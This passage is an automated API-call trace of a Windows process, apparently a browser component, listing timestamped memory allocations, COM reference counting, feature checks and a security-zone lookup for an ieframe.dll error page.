0xc4e3b8 [0161.311] VirtualAlloc (lpAddress=0x955e000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x955e000 [0161.312] malloc (_Size=0x30) returned 0xc5aa70 [0161.312] malloc (_Size=0xc) returned 0xc51fc0 [0161.312] malloc (_Size=0xc) returned 0xc521d0 [0161.312] malloc (_Size=0x10) returned 0xc52170 [0161.312] malloc (_Size=0x28) returned 0xc5d158 [0161.312] free (_Block=0xc52170) [0161.312] malloc (_Size=0x8c) returned 0xc63e70 [0161.312] VirtualAlloc (lpAddress=0x955f000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x955f000 [0161.313] malloc (_Size=0x30) returned 0xc5a488 [0161.313] VirtualAlloc (lpAddress=0x9560000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9560000 [0161.313] malloc (_Size=0xc) returned 0xc52128 [0161.313] malloc (_Size=0xc) returned 0xc52170 [0161.313] malloc (_Size=0x10) returned 0xc51ff0 [0161.313] malloc (_Size=0x30) returned 0xc5a958 [0161.314] malloc (_Size=0xc) returned 0xc52188 [0161.314] malloc (_Size=0xc) returned 0xc520c8 [0161.314] malloc (_Size=0x10) returned 0xc51f90 [0161.314] malloc (_Size=0x30) returned 0xc5a840 [0161.314] malloc (_Size=0xc) returned 0xc52050 [0161.314] malloc (_Size=0xc) returned 0xc51f30 [0161.314] malloc (_Size=0x10) returned 0xc520e0 [0161.314] malloc (_Size=0x28) returned 0xc5d338 [0161.314] free (_Block=0xc520e0) [0161.314] malloc (_Size=0x30) returned 0xc5a6b8 [0161.314] malloc (_Size=0xc) returned 0xc52068 [0161.314] malloc (_Size=0xc) returned 0xc521b8 [0161.314] malloc (_Size=0x10) returned 0xc52098 [0161.314] malloc (_Size=0x30) returned 0xc5a728 [0161.314] free (_Block=0xc84900) [0161.314] free (_Block=0xc840f0) [0161.314] free (_Block=0xc5d598) [0161.314] malloc (_Size=0x20) returned 0xc48610 [0161.315] malloc (_Size=0xc) returned 0xc51f78 [0161.315] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x66c06b0b, dwHighDateTime=0x1d7d80b)) [0161.315] GetTickCount () returned 0x1d72fcd [0161.315] GetCurrentThreadId () returned 0xb48 [0161.315] GetTickCount () returned 0x1d72fcd [0161.315] malloc (_Size=0xc) returned 0xc520e0 [0161.316] GetCurrentThreadId () returned 0xb48 [0161.316] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.316] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.316] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.316] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.316] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.317] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.317] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.317] malloc (_Size=0x28) returned 0xc5d2d8 [0161.317] GetCurrentThreadId () returned 0xb48 [0161.317] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.318] GetCurrentThreadId () returned 0xb48 [0161.318] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x66c1075c, dwHighDateTime=0x1d7d80b)) [0161.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x66c1075c, dwHighDateTime=0x1d7d80b)) [0161.319] GetTickCount () returned 0x1d72fdc [0161.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x66c1075c, dwHighDateTime=0x1d7d80b)) [0161.319] free (_Block=0xc48610) [0161.319] free (_Block=0xc5d2d8) [0161.319] GetTickCount () returned 0x1d72fdc [0161.319] GetTickCount () returned 0x1d72fdc [0161.319] SetEvent (hEvent=0x388) returned 1 [0161.319] GetCurrentThreadId () returned 0xb48 [0161.319] GetCurrentThreadId () returned 0xb48 [0161.319] GetCurrentThreadId () returned 0xb48 [0161.319] GetCurrentThreadId () returned 0xb48 [0161.320] GetCurrentThreadId () returned 0xb48 [0161.320] GetCurrentThreadId () returned 0xb48 [0161.320] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.320] memcpy_s (in: _Destination=0xd08b40, _DestinationSize=0xc0, _Source=0x199da0, _SourceSize=0x80 | out: _Destination=0xd08b40) returned 0x0 [0161.320] MulDiv (nNumber=442, nNumerator=100, nDenominator=100) returned 442 [0161.320] MulDiv (nNumber=256, nNumerator=100, nDenominator=100) returned 256 [0161.321] QueryPerformanceCounter (in: lpPerformanceCount=0x199e58 | out: lpPerformanceCount=0x199e58*=3098013967388) returned 1 [0161.321] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.321] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.321] GetFocus () returned 0x103e2 [0161.322] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.322] QueryPerformanceCounter (in: lpPerformanceCount=0x199de0 | out: lpPerformanceCount=0x199de0*=3098014068922) returned 1 [0161.322] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199c40 | out: lpPoint=0x199c40) returned 1 [0161.322] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.322] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.322] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.322] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x66c1a422, dwHighDateTime=0x1d7d80b)) [0161.322] GetTickCount () returned 0x1d72fdc [0161.322] IUnknown:AddRef (This=0xcf8c60) returned 0x5 [0161.323] IUnknown:Release (This=0xcf8c60) returned 0x5 [0161.323] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x66c1a422, dwHighDateTime=0x1d7d80b)) [0161.323] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x66c1b778, dwHighDateTime=0x1d7d80b)) [0161.323] GetTickCount () returned 0x1d72fdc [0161.323] GetCurrentThreadId () returned 0xb48 [0161.325] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.325] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dca00 [0161.325] GetCurrentThreadId () returned 0xb48 [0161.325] GetCurrentThreadId () returned 0xb48 [0161.325] free (_Block=0x0) [0161.325] free (_Block=0x0) [0161.326] GetCurrentThreadId () returned 0xb48 [0161.326] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.326] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.326] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.326] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.326] malloc (_Size=0x28) returned 0xc5d398 [0161.326] GetCurrentThreadId () returned 0xb48 [0161.326] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.326] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.326] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.327] GetCurrentThreadId () returned 0xb48 [0161.327] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.327] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.327] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.327] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.327] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.327] GetCurrentThreadId () returned 0xb48 [0161.327] GetCurrentThreadId () returned 0xb48 [0161.327] IUnknown:AddRef (This=0x68e1fc) returned 0x9 [0161.327] IUri:GetPropertyDWORD (in: This=0x68e1fc, uriProp=0x11, pdwProperty=0x19486c, dwFlags=0x0 | out: pdwProperty=0x19486c*=0x12) returned 0x0 [0161.327] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0161.328] IUnknown:QueryInterface (in: This=0xd1e334, riid=0x703b4c58*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0x1947c4 | out: ppvObject=0x1947c4*=0x0) returned 0x80004002 [0161.328] IInternetSecurityManager:GetSecurityId (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pbSecurityId=0x196938, pcbSecurityId=0x194924*=0x200, dwReserved=0x0 | out: pbSecurityId=0x196938*=0x0, pcbSecurityId=0x194924*=0x200) returned 0x800c0011 [0161.328] IUnknown:Release (This=0x6cdf88) returned 0x1 [0161.328] IUnknown:Release (This=0x68e1fc) returned 0x8 [0161.328] IMoniker:GetDisplayName (in: This=0x613358, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x194934 | out: ppszDisplayName=0x194934*="res://ieframe.dll/error.dlg") returned 0x0 [0161.329] CoTaskMemFree (pv=0x6c88d8) [0161.330] IUnknown:AddRef (This=0xcf8960) returned 0x3 [0161.330] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.330] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.330] GetCurrentThreadId () returned 0xb48 [0161.331] GetCurrentThreadId () returned 0xb48 [0161.331] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.331] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.331] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.331] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.331] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.331] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.332] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.332] IsCharSpaceW (wch=0x62) returned 0 [0161.332] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.332] IsCharSpaceW (wch=0x62) returned 0 [0161.333] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.333] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.333] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.333] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.333] GetCurrentThreadId () returned 0xb48 [0161.333] IUnknown:AddRef (This=0xd6ad20) returned 0x0 [0161.333] IUnknown:Release (This=0xd6ad20) returned 0x2 [0161.334] IUnknown:Release (This=0xd6ad20) returned 0x2 [0161.335] free (_Block=0x0) [0161.335] RtlInterlockedPopEntrySList (in: ListHead=0xbfebc8 | out: ListHead=0xbfebc8) returned 0x0 [0161.335] VirtualAlloc (lpAddress=0x9554000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9554000 [0161.335] malloc (_Size=0x22c) returned 0xc5d598 [0161.336] malloc (_Size=0x804) returned 0xc840f0 [0161.336] malloc (_Size=0x19c) returned 0xc5d7d0 [0161.336] VirtualAlloc (lpAddress=0x9555000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9555000 [0161.372] free (_Block=0xc5d7d0) [0161.372] VirtualAlloc (lpAddress=0x9557000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9557000 [0161.373] wcscpy_s (in: _Destination=0x735c620, _SizeInWords=0xa, _Source="anonymous" | out: _Destination="anonymous") returned 0x0 [0161.373] malloc (_Size=0xc) returned 0xc52200 [0161.373] malloc (_Size=0xc) returned 0xc51f18 [0161.374] malloc (_Size=0x10) returned 0xc5fc80 [0161.374] malloc (_Size=0x30) returned 0xc5a648 [0161.374] free (_Block=0xc840f0) [0161.374] free (_Block=0xc5d598) [0161.374] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.374] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.374] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.375] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.376] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.376] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.376] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.376] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.376] GetCurrentThreadId () returned 0xb48 [0161.376] IUnknown:AddRef (This=0xd6ad20) returned 0x0 [0161.376] IUnknown:Release (This=0xd6ad20) returned 0x3 [0161.377] IUnknown:Release (This=0xd6ad20) returned 0x2 [0161.377] free (_Block=0x0) [0161.377] RtlInterlockedPopEntrySList (in: ListHead=0xbfebc8 | out: ListHead=0xbfebc8) returned 0x0 [0161.377] VirtualAlloc (lpAddress=0x9554000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9554000 [0161.378] malloc (_Size=0x22c) returned 0xc5d598 [0161.378] malloc (_Size=0x804) returned 0xc840f0 [0161.378] malloc (_Size=0x19c) returned 0xc5d7d0 [0161.378] VirtualAlloc (lpAddress=0x9555000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9555000 [0161.379] free (_Block=0xc5d7d0) [0161.379] VirtualAlloc (lpAddress=0x9557000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9557000 [0161.379] wcscpy_s (in: _Destination=0x735c680, _SizeInWords=0xa, _Source="anonymous" | out: _Destination="anonymous") returned 0x0 [0161.380] malloc (_Size=0xc) returned 0xc5fcf8 [0161.380] malloc (_Size=0xc) returned 0xc5fb90 [0161.380] malloc (_Size=0x10) returned 0xc5fab8 [0161.380] malloc (_Size=0x30) returned 0xc5a680 [0161.380] free (_Block=0xc840f0) [0161.380] free (_Block=0xc5d598) [0161.380] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.380] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.380] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.381] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.382] GetCurrentThreadId () returned 0xb48 [0161.382] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.382] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.382] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.382] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.382] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.382] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.382] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.383] IsCharSpaceW (wch=0x62) returned 0 [0161.383] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.383] IsCharSpaceW (wch=0x62) returned 0 [0161.383] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.383] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.383] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.383] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.383] GetCurrentThreadId () returned 0xb48 [0161.384] IUnknown:AddRef (This=0xd6ab40) returned 0x0 [0161.384] IUnknown:Release (This=0xd6ab40) returned 0x2 [0161.384] IUnknown:Release (This=0xd6ab40) returned 0x2 [0161.384] free (_Block=0x0) [0161.384] RtlInterlockedPopEntrySList (in: ListHead=0xbfebc8 | out: ListHead=0xbfebc8) returned 0x0 [0161.384] VirtualAlloc (lpAddress=0x9554000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9554000 [0161.385] malloc (_Size=0x22c) returned 0xc5d598 [0161.385] malloc (_Size=0x804) returned 0xc840f0 [0161.385] malloc (_Size=0x19c) returned 0xc5d7d0 [0161.385] VirtualAlloc (lpAddress=0x9555000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9555000 [0161.386] free (_Block=0xc5d7d0) [0161.386] VirtualAlloc (lpAddress=0x9557000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9557000 [0161.386] wcscpy_s (in: _Destination=0x735c6c0, _SizeInWords=0xa, _Source="anonymous" | out: _Destination="anonymous") returned 0x0 [0161.387] malloc (_Size=0xc) returned 0xc5fbc0 [0161.387] malloc (_Size=0xc) returned 0xc5faa0 [0161.387] malloc (_Size=0x10) returned 0xc5fcc8 [0161.387] malloc (_Size=0x30) returned 0xc5a6f0 [0161.387] free (_Block=0xc840f0) [0161.387] free (_Block=0xc5d598) [0161.387] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.387] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.387] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.388] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.388] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.388] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.388] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.388] GetCurrentThreadId () returned 0xb48 [0161.388] IUnknown:AddRef (This=0xd6ab40) returned 0x0 [0161.388] IUnknown:Release (This=0xd6ab40) returned 0x3 [0161.389] IUnknown:Release (This=0xd6ab40) returned 0x2 [0161.389] free (_Block=0x0) [0161.389] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.389] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.389] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.389] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.390] GetCurrentThreadId () returned 0xb48 [0161.390] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.390] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.390] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.390] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.390] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.390] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.390] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.391] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.391] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.391] IUnknown:Release (This=0xcf9aa0) returned 0x1 [0161.391] free (_Block=0x0) [0161.391] RtlInterlockedPopEntrySList (in: ListHead=0xbfebc8 | out: ListHead=0xbfebc8) returned 0x0 [0161.391] VirtualAlloc (lpAddress=0x9554000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9554000 [0161.392] malloc (_Size=0x22c) returned 0xc5d598 [0161.392] malloc (_Size=0x804) returned 0xc840f0 [0161.392] malloc (_Size=0x19c) returned 0xc5d7d0 [0161.392] VirtualAlloc (lpAddress=0x9555000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9555000 [0161.393] free (_Block=0xc5d7d0) [0161.393] VirtualAlloc (lpAddress=0x9557000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9557000 [0161.393] wcscpy_s (in: _Destination=0x735c700, _SizeInWords=0xa, _Source="anonymous" | out: _Destination="anonymous") returned 0x0 [0161.393] malloc (_Size=0xc) returned 0xc5fce0 [0161.393] malloc (_Size=0xc) returned 0xc5fba8 [0161.393] malloc (_Size=0x10) returned 0xc5fbd8 [0161.393] malloc (_Size=0x30) returned 0xc5a798 [0161.394] free (_Block=0xc840f0) [0161.394] free (_Block=0xc5d598) [0161.394] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.394] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.394] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.394] IsCharSpaceW (wch=0x6f) returned 0 [0161.394] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.394] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.394] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.394] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.395] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x198bf0 | out: lpPoint=0x198bf0) returned 1 [0161.395] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.395] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.395] GetCurrentThreadId () returned 0xb48 [0161.395] GetCurrentThreadId () returned 0xb48 [0161.396] malloc (_Size=0xc) returned 0xc5fb48 [0161.396] GetCurrentThreadId () returned 0xb48 [0161.396] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.396] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.396] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.397] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.397] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.397] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.397] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.397] IsCharSpaceW (wch=0x73) returned 0 [0161.397] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.397] IsCharSpaceW (wch=0x73) returned 0 [0161.398] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.398] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.398] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.398] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.398] GetCurrentThreadId () returned 0xb48 [0161.398] IUnknown:AddRef (This=0xd1be80) returned 0x0 [0161.398] IUnknown:Release (This=0xd1be80) returned 0x2 [0161.399] IUnknown:Release (This=0xd1be80) returned 0x2 [0161.399] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.399] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.399] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.399] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.400] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.400] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.400] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.400] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x44) returned 0x692a40 [0161.401] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.401] IUnknown:Release (This=0xcfc47c) returned 0x6 [0161.401] IUnknown:Release (This=0xcfc47c) returned 0x5 [0161.401] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.401] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.401] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.402] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.403] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.404] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] 